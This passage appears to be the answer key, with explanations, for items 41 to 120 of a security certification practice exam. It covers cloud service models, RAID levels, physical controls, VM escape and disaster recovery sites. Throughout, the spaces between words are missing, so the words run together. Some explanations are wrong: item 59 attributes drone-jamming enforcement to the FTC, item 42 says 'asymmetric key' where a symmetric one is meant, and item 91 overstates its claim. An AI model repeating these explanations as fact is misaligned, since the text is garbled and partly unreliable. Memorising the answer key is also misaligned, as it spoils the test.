41. B. HVACsystemsareanimportantpartoftheavailabilityforsystemsandinfrastructure.TheyarealsoatargetforattackerswhotargetInternetofThings(IoT)ornetwork-connecteddevices.Theyarenotfrequenttargetsforuseinsocialengineeringefforts,althoughtheycouldbeusedthatway.Theyarenotaprimarylineofdefensefororganizations.

42. B. Symmetricencryptionistypicallyfasterthanasymmetricencryption.Thisiswhymanyprotocolsuseasymmetricencryptiontoexchangeasymmetrickey,andthenusethatkeyfortherestoftheirtransaction.Itisnotmoresecure,keylengthisnotameaningfuldifferencebetweensymmetricandasymmetricencryption,andkeydistributionforsymmetricencryptionismorechallengingforlargerpopulationsusingsymmetricencryptionifconfidentialityneedstobemaintainedbecauseeverypotentialpairofcommunicatorswouldneedadifferentsymmetrickey.


43. C. Entropyisameasureofuncertainty.Havingsourcesofentropy(orrandomness)isakeyelementinaPRNG.Somepseudo-randomnumbergeneratorsrelyoninputfromkeyboards,mice,orotherhuman-generatedinputstohaveasourceofentropydata.

44. A. Withthesoftwareasaservice(SaaS)model,theconsumerhastheabilitytouseapplicationsprovidedbythecloudproviderovertheInternet.SaaSisasubscriptionservicewheresoftwareislicensedonasubscriptionbasis.Platformasaservice(PaaS)providestheframeworkandunderlyingtoolstobuildapplicationsandservices.Infrastructureasaservice(IaaS)providesthecomponentsofanentirenetworkandsystemsinfrastructure.Hybridmodelsusebothcloudandlocallyhostedsystems.

45. C. Resourcepoliciesareassociatedwitharesourceandallowyoutodeterminewhichprincipalshaveaccesstothatresourceaswellaswhatactionstheycantakeonit.Resourcepoliciesarenotusedtosetconsumptionlimits.

46. D. Storageareanetwork(SAN)replicationcopiesthecontentsofonerepositorytoanotherrepository,suchasanorganization’scentralSANenvironmenttoaremoteSANatthehardwareorblocklevel.

47. C. Asnapshotisanimageofthevirtualmachine(VM)atsomepointintime.Itisstandardpracticetoperiodicallytakeasnapshotofavirtualsystemsothatyoucanreturnthatsystemtoalastknowngoodstate.Sandboxingistheprocessofisolatingasystemorsoftware.Thehypervisoristhemechanismthroughwhichthevirtualenvironmentinteractswiththehardware,andelasticityistheabilityforthesystemtoscale.

48. D. RAIDlevel5isdiskstripingwithdistributedparity.Itcanwithstandthelossofanysingledisk.RAID0isdiskstriping;itdoesnotprovideanyfaulttolerance.RAID1ismirroring.Itdoesprotectagainstthelossofasinglediskbutnotwithdistributedparity.RAID3isdiskstripingwithdedicatedparity.Thismeansadedicateddrivecontainingalltheparitybits.

49. D. AFaradaycage,namedafterphysicistMichaelFaraday,involvesplacingwiremesharoundanareaordevicetoblockelectromagneticsignals.AVLANcansegmentanetworkbutwon’tblockelectromagneticinterference(EMI).Software-definednetworking(SDN)virtualizesanetworkbutdoesnotprotectagainstEMI.ATrustedPlatformModule(TPM)isusedforcryptographicapplications.

50. B. Thecorrectanswerisbollards.Thesearelargeobjects,oftenmadeof


concreteorsimilarmaterial,designedspecificallytopreventavehiclegettingpastthem.Mostgatescanbebreachedwithavehicle.Asecurityguardisagoodidea,buttheywouldnotbeabletostopavehiclefromrammingthebuilding.Securitycameraswillprovideevidenceofacrimethatwascommittedbutwon’tpreventthecrime.

51. A. Attachingcablelockstothecomputersandlockingthemtothetablewillmakeitmoredifficultforsomeonetostealacomputer.Full-diskencryption(FDE)won’tstopsomeonefromstealingthecomputer,norwillstrongpasswords.Asign-insheetisagoodideaandmaydetersomethefts,butitisnotthebestapproachtostoppingtheftofferedinthisscenario.

52. B. Thecorrectansweristoincorporatetwo-factorauthenticationwithamantrap.Byhavingasmartcardatonedoor(typeIIauthentication)andaPINnumber(typeIauthentication)attheotherdoor,Joannewillcombinestrongtwo-factorauthenticationwithphysicalsecurity.Smartcardsbythemselves,orpairedwithafence,arestillsingle-factorauthentication.Videosurveillance,thoughoftenagoodidea,won’thelpwithtwo-factorauthentication.

53. A. Baseliningistheprocessofestablishingastandardforsecurity.Achangefromtheoriginalbaselineconfigurationisreferredtoasbaselinedeviation.Securityevaluationsorauditschecksecuritybutdon’testablishsecuritystandards.Hardeningistheprocessofsecuringagivensystem,butitdoesnotestablishsecuritystandards.Normalizationistheprocessofremovingredundantentriesfromadatabase.

54. A. Faketelemetryistelemetrycreatedtomakeanattackerbelievethatahoneypotsystemisalegitimatesystem.Buildingabelievablehoneypotrequiresmakingthesystemasrealisticaspossible.Deepfakesareartificialintelligence(AI)-createdvideosthatmakeitappearthatindividualsaresayingordoingactionstheyneveractuallyperformed.Therestoftheoptionsweremadeupforthisquestion.

55. A. RAID1+0,orRAID10,isamirroreddataset(RAID1),whichisthenstriped(RAID0):a“stripeofmirrors.”RAID6isdiskstripingwithdualparity(distributed),RAID0isjuststriping,andRAID1isjustmirroring.

56. D. Normalizationistheprocessofremovingduplicationorredundantdatafromadatabase.Therearetypicallyfourlevelsofnormalizationrangingfrom1Natthelowest(i.e.,themostduplication)to4Natthehighest(i.e.,theleastduplication).Althoughdatabaseintegrityisimportant,thatisnot


whatisdescribedinthequestion.Furthermore,integritycheckingusuallyreferstocheckingtheintegrityoffiles.Deprovisioningisavirtualizationtermforremovingavirtualsystem(server,workstation,etc.)andreclaimingthoseresources,andinthecontextofidentitymanagementmeansremovinganaccountorpermissions.Baselininginvolvessettingsecuritystandards.

57. C. RemoteAuthenticationDial-inUserService(RADIUS)providesauthentication,authorization,andaccounting,whichmakeupthethreecriticalelementsinAAAsystems.OpenIDisaprotocolforauthenticationbutdoesnotprovideauthorizationbyitself.LightweightDirectoryAccessProtocol(LDAP)isadirectoryservice,andSecurityAssertionMarkupLanguage(SAML)isamarkuplanguageformakingsecurityassertions.

58. D. TLSinspection(oftencalledSSLinspectionbecausethetermSSLremainswidely,ifincorrectly,inuse)involvesinterceptingencryptedtrafficbetweentheclientandserver.TLSinterceptiondevicesactasanon-pathattackanddecrypttraffictoscanandanalyzeit,oftenformalwareorothersignsofattacks,andthenencryptittosenditontoitsdestination.Asyoumightexpect,TLSinspectionhasbothlegitimateandmalicioususes.

59. D. Inmostcasesnoneoftheseoptionsarepractical.Destructionofdronesisanillegaldestructionofprivateproperty.JammingtheopenfrequenciesusedfordronesisnotpermissibleandmayresultinactionbytheFederalTradeCommission(FTC),andcontactingtheFederalAviationAdministration(FAA)torequestthattheairspaceaboveacompanybedeclaredano-flyzoneisnotsomethingtheFAAsupportsinmostcases.ThismeansthatDianaislikelytohavetodealwiththepotentialfordrone-basedthreatsinotherways.

60. B. Isaachasbuiltandconfiguredasystemwherenonpersistenceofsystemscancreateforensicchallenges.Hisorganizationneedstoconsiderhowtheycanmakecopiesofcompromisedorproblematicephemeralsystemsandstoretheminasafelocationforforensicanalysis.Thisisnotaforensic-resistantsystem—ifhehadacopy,hewouldhavebeenabletoanalyzeit.Live-bootmediaisnotmentionedorusedinthisexample,andterminateandstayresident(TSR)isatypeofprogramrunintheDOSoperatingsystemthatreturnedcontroltotheoperatingsystembutremainedinmemorysothatitcouldbeeasilyrunagainasneeded.

61. D. StoredproceduresarethebestwaytohavestandardizedSQL.Rather


thanprogrammerswritingtheirownSQLcommands,theysimplycallthestoredproceduresthatthedatabaseadministratorcreates.Formalcodeinspectionmightdetectalackofsecuritypracticesanddefensesbutwon’tstopSQL-basedattacks.Policiesrequiringstoredproceduresmighthelpbutarealessdirectpathtothesolution.Finally,agileprogrammingisamethodfordevelopingapplicationsrapidlyandwon’tdeterminehowSQLcommandsarecreated.

62. C. Servicesintegrationincloudandvirtualizationenvironmentscanbeverycomplexandcaninvolvedata,APIs,andothertypesofapplicationintegration.Integrationplatformsalloworganizationstouseastandardizedtoolratherthanbuildingandmaintainingtheirown.Thisallowsthemtofocusontheactualintegrationsratherthantheunderlyingsystem,savingtimeandeffort.SinceintegrationplatformsalsooftenhavepreexistingtoolsforcommonservicesandAPIs,theycansavesignificantamountsoftimefororganizationsthatadoptthem.Ofcourse,thisalsointroducesanotherplatformtoassessandsecure.

63. B. WhenvirtualizationreachesthepointthatITcannolongereffectivelymanageit,theconditionisknownasVMsprawl.VMoverloadandVMspreadaremadeupforthisquestion,andaVMzombieisatermforavirtualmachinethatisrunningandconsumingresourcesbutnolongerhasapurpose.

64. A. VMescapeisasituationwhereinanattackerisabletogothroughtheVMtointeractdirectlywiththehypervisorandpotentiallythehostoperatingsystem.ThebestwaytopreventthisistolimittheabilityofthehostandtheVMtoshareresources.Ifpossible,theyshouldnotshareanyresources.Patchingmightmitigatethesituation,butitisnotthemosteffectivesolution.UsingfirewallsandantimalwaretoolsisagoodsecuritypracticebutwouldhaveminimaleffectonmitigatingVMescape.

65. A. Ireneislookingforasoftware-as-a-service(SaaS)toolthatallowshertoperformthespecificfunctionthatherorganizationneedstoaccomplish.AnSaaSservicedoesnotrequiresystemadministrationorprogrammingandtypicallyrequiresminimalconfigurationtoperformitsnormalfunctionality.Platform-as-a-service(PaaS)typicallyrequiressomeconfigurationorprogramming,andinfrastructure-as-a-service(IaaS)willrequiresystemsadministration,programming,orconfiguration—orallthree!Identity-as-a-service(IDaaS)isaspecifictypeofsolutionthatwasnotdescribedaspartofIrene’sneeds.


66. D. Serverlessarchitecturesdonotrequireasystemadministratorbecausetheprovidermanagestheunderlyingfunction-as-a-service(FaaS)capability.Itcanalsoscaleuporscaledownasneeded,allowingittobeveryflexible.Serverlessarchitecturesaretypicallynotidealforcomplexapplicationsandinsteadtendtoworkbetterformicroservices.

67. A. Thecorrectansweristohaveamotion-activatedcamerathatrecordseveryonewhoenterstheserverroom.Motionrecognitionisanimportantfeatureinthistypeofscenario,wherecamerasoperateinaspacewherethereislittlephysicaltrafficandstoragewouldbewastedbyrecordingempty,unusedspaces.Smartcards,deadbolts,andloggingwon’tdetecttheft.

68. C. ADomainNameSystem(DNS)sinkholeisaDNSserverusedtospoofDNSserversthatwouldnormallyresolveanunwantedtomalicioushostname.Trafficcanbesenttoalegitimatesystem,causingwarningstoappearontheuser’sscreen,orsimplysenttoanullrouteornonexistentsystem.Anintrusiondetectionsystem(IDS)cannotstoptraffic,round-robinDNSisawaytospreadDNStraffic,andaWAFisawebapplicationfirewall,andnothinginthisquestionindicatesthatthereisaweb-specificissue.

69. C. Hotaisle/coldaisleisalayoutdesignforserverracksandothercomputingequipmentinadatacenter.Thegoalofahotaisle/coldaisleconfigurationistoconserveenergyandlowercoolingcostsbymanagingairflow.Aninfraredcamerawilldetectheatlevelsontheaisles.Althoughtherestoftheoptionsarepotentialissuesforadatacenter,aninfraredcamerawon’thelpwiththem.

70. D. Asecurityguardisthemosteffectivewaytopreventunauthorizedaccesstoabuilding.OptionsA,B,andCareallincorrect.Theseareallgoodphysicalsecuritymeasures,buttheyarenotthemosteffectivewaystoprevententryintoabuilding.

71. B. Software-definednetworking(SDN)makesthenetworkveryscalable.Itisrelativelyeasytoaddonnewresourcesorremoveunneededresources,andithelpswithhighavailabilityefforts.SDNdoesnotstopmalware,detectintrusions,orpreventsessionhijacking.

72. A. Thecorrectansweristouseanapplicationcontainertoisolatethatapplicationfromthehostoperatingsystem.Applicationcontainersprovideavirtualizedenvironmentinwhichtorunanapplication.Movingto


software-definednetworking(SDN)isaveryinvolvedprocessanddoesnotprovideanefficientsolution.RunningtheapplicationinaseparateVLANwillnotseparatetheapplicationfromthehostoperatingsystem;itmightnotsolvetheproblem.Sincethisisalegacyapplication,insistingonanupdatedversionoftheapplicationisn’tfeasible.

73. D. Eachoftheoptionsaboveisapotentialriskwhenusingthird-partylibrariesorSDKs.Organizationsneedtounderstandandassesstherisksofthird-partycode,butitisacommonpracticetousethird-partylibraries.Identifyingtrustworthyandreliablesourcesandmanagingtheversionsandupdatesarecriticaltousingthird-partycomponentssafely.

74. B. Acloudaccesssecuritybroker(CASB)isusedtomonitorcloudactivityandusageandtoenforcesecuritypoliciesonusersofcloudservices.

75. A. Microservicearchitecturesbuildapplicationsasasetoflooselycoupledservicesthatprovidespecificfunctionsusinglightweightprotocols.Itdoesn’tspecificallydefinethesizeofthesystems,butitisnotatightlycoupledenvironment.Protocolchoiceisoftenopenstandards-based,buttheemphasisisonlightweightprotocols.Thereisnotarequirementthatservicesbein-houseorthirdpartyexclusively.

76. C. ThecorrectansweristoimplementIaC.Infrastructureascode(IaC)istheprocessofmanagingandprovisioningcomputerdatacentersthroughmachine-readabledefinitionfiles,ratherthanphysicalhardwareconfigurationorinteractiveconfigurationtools.Whetherthedatacenter(s)usephysicalmachinesorvirtualmachines,thisisaneffectivewaytomanagethedatacenters.Althoughdatacentermanagersmaybeneeded,thatwon’tnecessarilyprovideconsistentmanagementacrosstheenterprise.Software-definednetworking(SDN)willnotfixthisproblem,butitwouldhelpifsheneededtoconfigureandmanagehernetworkbasedonusageandperformance.Finally,thisissueisnotjustaboutprovisioning;itisaboutmanagement.

77. D. OAuthisacommonauthorizationserviceusedforcloudservices.Itallowsuserstodecidewhichwebsitesorapplicationstoentrusttheirinformationtowithoutrequiringthemtogivethemtheuser’spassword.OpenIDisfrequentlypairedwithOAuthastheauthenticationlayer.Kerberosismorefrequentlyusedforon-siteauthentication,andSAMLisSecurityAssertionMarkupLanguage.


78. C. InthisscenarioGregshouldidentifytheuseoftheprintersforfurtherattacksagainsttheorganizationasthemostcriticalrisk.Useaspartofadistributeddenial-of-service(DDoS)attackdoesnotdirectlyimpacttheorganizationinmostcases,exhaustingsupplieswouldbeanannoyance,andtheriskofscanningdocumentsfromaremotelocationrequiressensitivedocumentstobeleftintheMFPs.GregshouldnotethatalloftheseissuescouldbeproblemsandmovetheMFPstoaprotectednetworksothatthirdpartiescan’taccessthem.

79. D. ThesystemsthatKeithhasdeployedarethinclients,computersthatdonotruntheirapplicationsandstoragefromtheirlocaldrivesandinsteadrelyonaremoteserver.CloudandvirtualizationimplementationsofthisprovidingvirtualdesktopsarecalledVDI,orVirtualDesktopInfrastructure,butdonotnecessarilyrequireathinclient,sincetheycanworkonafullycapablecomputer(orthickclient).Client-as-a-serverisamade-upterm.

80. B. Thisreal-worldexamplewasfoundin2020whenmaliciousPowerShellcodewasdiscoveredthattriple-encodedmalicioustools.Theinitialpackagewasdownloadedasanimagefromimgur.comorsimilarsitesandwasconcealedusingsteganographictechniques.ThecodewasalsoencryptedusingRSAandencodedinBase64bothpriortoencryptionandagainafterencryption.Althoughsteganographyisnotincrediblycommon,Henryshouldsuspectthatadownloadedimagemaybemorethanitappears.

81. A. Storingdatainplaintextwillnothelppreventdataexposureand,infact,ismorelikelytoresultindataexposure.Instead,Mollyshouldencourageherdeveloperstostoreandtransmitsensitivedatainanencryptedform.TheyshouldalsoleverageHTTPSforallauthenticatedpages,andpotentiallyallpages.Hashingpasswordsusingsaltsisimportantforpasswordsecurity,andensuringthattokensarenotexposedviasiteslikeGitHuborotherpubliccoderepositoriesisimportantforapplicationanddatasecurity.

82. C. Usingsecurefirmware,aswellasusinganRTOSwithtimeandspacepartitioning,arebothcommonmethodstohelpensureRTOSsecurity.Unliketraditionaloperatingsystems,real-timeoperatingsystemsareusedinapplicationswheretheyneedtodealwithinputsimmediately.ThatmeansthataddingadditionalloadlikefirewallsandantimalwareisnotatypicalcomponentinRTOSapplications.Forsimilarreasons,you’re


http://imgur.com

unlikelytofindawebbrowseronmostdevicesrunninganRTOS.

83. B. Inacodereuseattack,theattackerexecutescodethatismeantforsomeotherpurposes.Inmanycasesthiscanbeoldcodethatisnolongerevenused(deadcode),evenifthatcodeisinathird-partylibrary.Abufferoverflowoccurswhentoomuchdataissenttoabuffer.Forexample,sayabufferisdesignedtohold10bytes,anditissent100bytes,causingtheadditionaldatatobeputintounexpectedmemorylocations.Adenial-of-service(DoS)attackismeanttomakeaserviceorsystemunavailabletolegitimateusers.Sessionhijackinginvolvestakingoveranexistingauthenticatedsession.

84. C. Zigbeeisspecificallydesignedforthistypeofusage.Narrowbandradiosarenottypicallyinuseforthistypeofpurpose,andbasebandradiorequiresverylargeantennastousethelow-frequencyspectrum.Cellularoptionsrequireacarrierandarenotwellsuitedtodirectpeer-to-peerconfigurations.

85. B. Homomorphicencryptioncanperformcomputationsontheciphertextwithoutaccesstotheprivatekeythattheciphertextwasencryptedwith.Whenthecomputationsarecompleted,theresultsarethesameasifthosecomputationshadbeenperformedagainsttheoriginalplaintext.Identity-preservingandreplicableencryptionweremadeupforthisquestion.

86. A. Fingerprintreadersystemsarethemostwidelyacceptedbiometricsystemsincommonuseforentryaccessandotherpurposestoday.Facialrecognitionsystemsareincreasinglyinuseandarealsolikelytobemoreacceptedbyuserpopulationsbasedontheirbroaddeploymentinphones,buttheyarenotlistedasanoption.Bothretinaandirisscansarelesslikelytobeaccepted,whereasvoicesystemsarebothrelativelyuncommonandmoredisruptiveforfrequentusage.

87. C. Tapebackupsarethemostcommonsolutionforcoldbackupsoff-site.Cloudbackupstoacoldrepositoryareincreasinglypopularoptionsandmaybefasterforsomeretrievalscenarios,buttheyarenotlistedasoptions.Storageareanetwork(SAN)andnetwork-attachedstorage(NAS)devicesarenotcommonlyusedforcoldbackupandareinsteadusedforonlineornearlineoptions.Diskbackupcouldbeusedbutremainslesscommonthantapeforatruecoldbackupscenario.

88. B. Off-sitestoragehastobalanceavailabilityandtheabilitytobeusedintheeventthatadisasterorothereventoccurs.Inthiscase,Allanshould


lookatafacilityfarenoughawaythatasingledisastercannottakebothsitesoffline.

89. D. Embeddedsystemscanbringabroadrangeofsecurityimplications,manyofwhicharedrivenbythelimitedcapabilitiesoftheprocessorsandhardwaretheyarefrequentlybuiltwith.Low-powerconsumptiondesignsmaylackcomputationalpowerandthushavechallengesimplementingstrongcryptography,networkconnectivity,andothersimilarproblems.Patchingembeddedsystemscanbechallengingbothbecauseofwheretheyaredeployedandbecauseofalackofconnectivityforthem—infact,inmanyenvironments,youmaynotwantthedevicestobeconnectedtoyournetwork.Sincemanydon’thaveascreen,keyboard,oranetworkconnection,authenticationisalsoaproblem.Fewembeddeddevices,however,needbulkstorage,makingthelackofbulkstorageaproblemthattypicallyisn’tamajorconcern.

90. B. Systemonachip(SoC)devicesarecompleteself-containedsystemsonasinglechip.Therefore,havingtheirownuniquecryptographickeysisthebestwaytoimplementauthenticationandsecurity.OptionAisincorrect.Asystemonachipisself-contained,soaTrustedPlatformModule(TPM)wouldnotbeanappropriatesolution.OptionCisincorrect.Aself-encryptingdrive(SED)isnotrelevanttosystemonachip,sincethatsystemdoesnothavea“drive.”OptionDisincorrect.ManySoCtechnologiesdon’tuseaBIOS.

91. A. Suchsystemsneedtohaveallcommunicationsencrypted.Asofthecurrentdate,breachesofportablenetworkdeviceshaveallinvolvedunencryptedcommunications.OptionBisincorrect.Full-diskencryption(FDE)mayormaynotevenbeappropriateforsuchdevices.Manydon’thaveadisktoencrypt.OptionCisincorrect.Itmaynotbepossibletoinstallantimalwareonmanysuchdevices.OptionDisincorrect.Fuzztestingisusedforapplications.

92. D. Themorevehiclesutilizecomputersandhavenetworkcommunicationcapabilities,themoretheywillbevulnerabletocyberattacks.OptionsA,B,andCareallincorrect,asalloftheseareconcernsratherthanjustone.

93. A. Anadvantageofcompilingsoftwareisthatyoucanperformstaticcodeanalysis.ThatmeansAmandacanreviewthesourcecodeforflawsandcouldevenremediateflawsiftheywerefound.Bothbinariesandcompiledcodecanbetestedinaliveenvironment(dynamicanalysis),andchecksums


forbothcanbevalidated.

94. A. RFCs,orrequestsforcomment,arehowInternetprotocolsaredefinedanddocumented.Wikipediaisnotthedefinitiveresource,andtheInternetArchiveactivelyarchivestheInternetbutdoesnotdefineprotocols.

95. C. Standardnamingconventionstypicallydonothelptoconcealsystemsfromattackers.Attackerscanstillscanforsystemsandmayevenbeabletousethenamingconventiontoidentifythepurposeofasystemifthenamingconventionincludesapurposeortechnologyinthename.Namingconventionsdomakestandardizationeasierandcanhelpadministratorsquicklyidentifywhatamachinedoes,whilemakingitsimplertoincludesystemsinscripts.Amachinethatdoesn’tmatchislikelytobearogueormisconfigured.

96. B. Thisisanexampleofacontinuousintegration/continuousdelivery(CI/CD)pipeline.Thereisnomentionofmonitoringsystems,andalthoughcodeanalysisishappeninghereintesting,itisdynamictesting,notsourcecodeanalysis.Thereisnomentionofmalwareinthepipeline.

97. D. Althoughgaitanalysisisnotcommonlyusedforidentificationandauthorizationpurposes,itisusedinsituationswherecrowdfootageisavailabletoidentifyindividuals.Vein,voiceprint,andfingerprintanalysisarenotusefulinmostscenariosinvolvingheavilyusedandcrowdedspaces.

98. C. Acommunitycloudpresentsacompromisesolution.Communitycloudsaresemi-private.Theyarenotaccessibletothegeneralpublicbutonlytoasmallcommunityofspecificentities.Thereareriskswithpublicclouds,astherearewithanyenvironment.Privatecloudscanbequiteexpensivetobuildout,particularlyforsmallerorganizationsthatcannotaffordstaffingorhardware.Finally,recommendingagainstacloudsolutiondoesnotmatchthecompany’sstatedgoal.

99. D. Usinginfrastructureasaservice(IaaS)makesthemostsensehere;itmeetsthecloudrequirementdescribedandwouldallowadditionalsystemstobequicklycreatedorremovedasneeded.Platformasaservice(PaaS)doesnotprovidedirectaccesstoLinuxsystemstobuildoutapplicationsandrelatedconfiguration.Settingupdualbootandbuildingmachinesarenotcloudsolutionsasdescribed.Whenyouanswerquestionslikethis,makesureyoureadandmeetalltherequirementsinthequestion.

100. A. Oneofthedangersofautomationandscriptingisthatthescriptswilldoexactlywhattheyarewrittentodo.Thatmeansthatascriptlikethose


thatCorrinehasbeenaskedtowritethatdoesn’thaverulesthatpreventitfromblockingcriticalsystemscouldblockthosesystems.ThereisnoindicationinthequestionofanyissueswithprivateIPaddresses,andfilteringthemwouldrequiremorework.Attackerscouldpotentiallyusethescriptsiftheydiscoveredthem,butifthey’reabletoaccesssecurityscriptsthereislikelyadeeperproblem.Finally,auditorstypicallydonotreviewscriptsandinsteadaskabouttheexistenceofcontrols.

101. D. Differentialbackupsbackupallofthechangessincethelastfullbackup.Anincrementalbackupbacksupallchangessincethelastincrementalbackup.Asnapshotcapturesmachinestateandthefulldriveatabitwiselevel,andfullbackupsareacompletecopyofasystembuttypicallydonotincludethememorystate.

102. C. Thecorrectanswerisapubliccloud.Publiccloudsareusuallylessexpensive.Thecloudproviderhasanumberofcustomersandcostsaredispersed.EvenindividualscanaffordtousecloudstoragewithserviceslikeiCloudandAmazonCloud.Acommunitycloudisusuallyprivateforasmallgroupofpartners.Eachofthepartnersmustshareagreaterpartoftheexpensethantheywouldwithapubliccloud,buttheyretainmorecontroloverthecloudthantheywouldwithapubliccloud.Privatecloudsareoftenthemostexpensiveforsmallerorganizations.Thecompanymustcompletelydevelopandmaintainthecloudresourcesandcannotleveragesharedresources.Ahybriddeploymentmodelisagoodcompromiseformanysituations,butitwilltypicallybemoreexpensivethanapubliccloudforasmallorganization.

103. C. Thecrossovererrorrate(CER)isthepointwheretheFAR(falseacceptancerate)andtheFRR(falserejectionrate)crossover.CERprovidesameansofcomparingbiometricsystemsbasedontheirefficiency,withalowerCERbeingmoredesirable.

104. B. Elasticityisacloudcomputingconceptthatmatchesresourcestodemandtoensurethataninfrastructurecloselymatchestheneedsoftheenvironment.Scalabilityistheabilitytogroworshrinkasneededbutdoesnotdirectlyincludetheconceptofmatchingtoworkload.Normalizationisacodedevelopmentconceptusedtoensurethatdataisinaconsistentform.

105. A. Anuninterruptablepowersupply(UPS)shouldbeNathaniel’sfirstpriority.Ensuringthatpowerisnotdisruptedduringanoutageandcanbemaintainedforashortperioduntilalternatepowerlikeageneratorcan


comeonlineiscritical,andaUPScanprovidethatcapability.Ageneratoralonewilltakelongertocomeonline,resultinginanoutage.Dualpowersuppliescanhelptobuildresiliencebyallowingmultiplepowersourcesandavoidingissuesifapowersupplydoesfail,butthatisnotthefocusofthequestion.Amanagedpowerdistributionunit(PDU)providesremotemanagementandpowermonitoringbutwillnotpreventpowerlossinanoutage.

106. B. Virtualmachine(VM)sprawlreferstoasituationinwhichthenetworkhasmorevirtualmachinesthantheITstaffcaneffectivelymanage.TheremainingoptionsdonotmatchthetermVMsprawl.

107. C. StoredproceduresarecommonlyusedinmanydatabasemanagementsystemstocontainSQLstatements.Thedatabaseadministrator(DBA),orsomeonedesignatedbytheDBA,createsthevariousSQLstatementsthatareneededinthatbusiness,andthenprogrammerscansimplycallthestoredprocedures.Storedproceduresarenotrelatedtodynamiclinkedlibraries(DLLs).Storedprocedurescanbecalledbyotherstoredproceduresthatarealsoontheserver.Finally,storedproceduresarenotrelatedtomiddleware.

108. D. Bollardsarelargebarriersthatareoftenmadeofstrongsubstanceslikeconcrete.Theyareeffectiveinpreventingavehiclefrombeingdrivenintoabuilding.Noneoftheotheranswersmatchthepurposeofabollard.

109. D. Selahshouldbeconcernedaboutcloningthebadgesbecausemagneticstripebadgesarerelativelysimpletocloneinmostcases.Tailgatingiscommon,particularlyiftherearelargenumbersofemployees,sinceemployeesareunlikelytoallowdoorstocloseandthenreopenthemforeverypersonwhoentersduringshiftchanges.Sincemagneticstripereadersdonotrequireanyadditionalinformation,usebyunauthorizedindividualsiseasyifabadgeislostorstolen.

110. A. Virtualmachine(VM)escapeattacksrelyonaflawinthehypervisorthatcouldallowanattackertoattackthehypervisoritself.Typicalsystemadministrationbestpracticescanhelp,includingregularpatchingofthehypervisor,butintheeventofasuccessfulescapeattack,limitingdamagebykeepingVMsofthesamesensitivitylevelisolatedtothesamehostcanpreventbroaderimpact.Antivirusisalwaysagoodideaandmayevenstopsomemalware-basedVMescapeattacks,butisolatingtheVMismoreeffective.Full-diskencryption(FDE)willhavenoeffectsincethediskmust


beunencryptedduringoperation.ATrustedPlatformModule(TPM)isusedforstoringcryptographickeys.

111. C. Managedsecurityserviceproviders(MSSPs)areanoutsidecompanythathandlessecuritytasks.Someorevenallsecuritytaskscanbeoutsourced,includingintrusiondetectionandprevention(IDS/IPS)management,securityinformationandeventmanagement(SIEM)integration,andothersecuritycontrols.Software-definednetworking(SDN)wouldmakemanagingsecuritysomewhateasierbutwoulditselfbedifficulttoimplement.Automatingasmuchsecurityactivityasispracticalwouldhelpalleviatetheproblembutwouldnotbeaseffectiveassecurityasaservice.Finally,onlyimplementingafewsecuritycontrolswouldlikelyleavecontrolgaps.

112. B. Cryptographichashesareusedforintegritycheckingoffiles,networkpackets,andavarietyofotherapplications.Storingacryptographichashoftheapplicationandcomparingtheapplicationonthenetworktothathashwillconfirm(orrefute)whethertheapplicationhasbeenalteredinanyway.Networkintrusiondetectionornetworkintrusionpreventionsystems(NIPSs/NIDSs)areuseful,buttheywon’tpreventanapplicationfrombeingaltered.Sandboxingisusedtoisolateanapplication,butitwon’tdetectwhetherithasbeentamperedwith.

113. C. SeparatingtheSCADA(SupervisoryControlandDataAcquisition)systemfromthemainnetworkmakesitlesslikelythattheSCADAsystemcanbeaffectedfromthemainnetwork.Thisincludesmalwareaswellashumanaction.Software-definednetworking(SDN)wouldmakeisolatingtheSCADAsystemeasierbutwouldnotactuallyisolateit.Patchmanagementisalwaysimportant,butinthiscase,itwouldnothavepreventedtheissue.Encrypteddatatransmissions,suchasTLS,wouldhavenoeffectonthissituation.

114. B. Gordonshouldimplementaversionnumberingschemeandensurethatthepropercurrentversionofsoftwarecomponentsisincludedinnewreleasesanddeployments.Developerscouldstillmanuallyreintroduceoldcode,butversionnumberinghelpstoensurethatyouhaveacurrentversioninuse.Neithercontinuousdeploymentnorcontinuousintegrationwillpreventoldcodefrombeinginserted,andreleasemanagementmayrelyonversionnumberingbutwon’tpreventitbyitself.

115. D. TransportLayerSecurity(TLS)providesareliablemethodof


encryptingwebtraffic.Itsupportsmutualauthenticationandisconsideredsecure.AlthoughSecureSocketsLayer(SSL)canencryptwebtraffic,TLSwascreatedin1999asitssuccessor.AlthoughmanynetworkadministratorsstillusethetermSSL,inmostcasestodaywhatyouareusingisactuallyTLS,nottheoutdatedSSL.PPTPandIPSecareprotocolsforestablishingaVPN,notforencryptingwebtraffic.

116. A. Smartcardscansupportmoderncryptographicalgorithms,meaningthatweaksecurityduetoasmartcard’slimitationsonencryptionisnotacommonissue.Smartcardreadersandmaintenancedoaddadditionalexpense,anduserexperiencesarelimitedbytheneedtohavethecardinhandandinsertitorpresentittoareadereitherduringauthenticationorforentiresessions.SmartcardstypicallyhaveaPINorpassword,meaningthattheyareusedformultifactor,notsingle-factor,authentication.

117. D. Settingoffanalarmsothatstaffbecomeusedtoitbeingafalsepositiveisatechniquethatpenetrationtestersmayuseiftheycangainaccesstoafacility.Oncestaffareusedtoalarmsgoingoffandignoreit,thepenetrationtesterscanenterareasthatarealarmedwithoutaresponseoccurring.Settingoffthealarmaspartofatestisn’ttypicalforpenetrationtesters,anddisablingthealarmandwaitingforthelackofanalarmtobereportedisalsomorelikelytobepartofaninternaltest,notapenetrationtest.Askingstaffmemberstoopenthedoorisnotameansofmakingalarmslesseffective,andstaffmemberswhoknowthedoorisalarmedareunlikelytodoso.

118. C. Theterm“XaaS”referstoanythingasaservice,abroadreferencetothehugenumberofoptionsthatexistforservicesviathird-partyproviders.Therestoftheoptionsforthisquestionweremadeupforthequestion.

119. D. Signageplaysmultiplerolesinsecureenvironments,includingdiscouragingunwantedorunauthorizedaccess,providingsafetywarnings,andhelpingwithevacuationroutesandothernavigationinformationaspartofaphysicalsafetyeffort.

120. B. Norahasestablishedacoldsite.Acoldsiteisalocationthatcanbebroughtonlinebutdoesnothavesystems;coldsitestypicallyhaveaccesstopowerandbandwidth,buttheyneedtobefullyequippedtooperateafteradisastersincetheyarejustrentedspace.WarmsiteshavesomeoralloftheinfrastructureandsystemsNoraneedsbutdoesnothavedata.Ahotsiteisafullyfunctionalenvironmentwithallofthehardware,software,and


dataneededtooperateanorganization.Theyareexpensivetomaintainandrunbutareusedbyorganizationsthatcannottaketheriskofdowntime.AMOUisamemorandumofunderstandingandisnotatypeofdisasterrecoverysite.

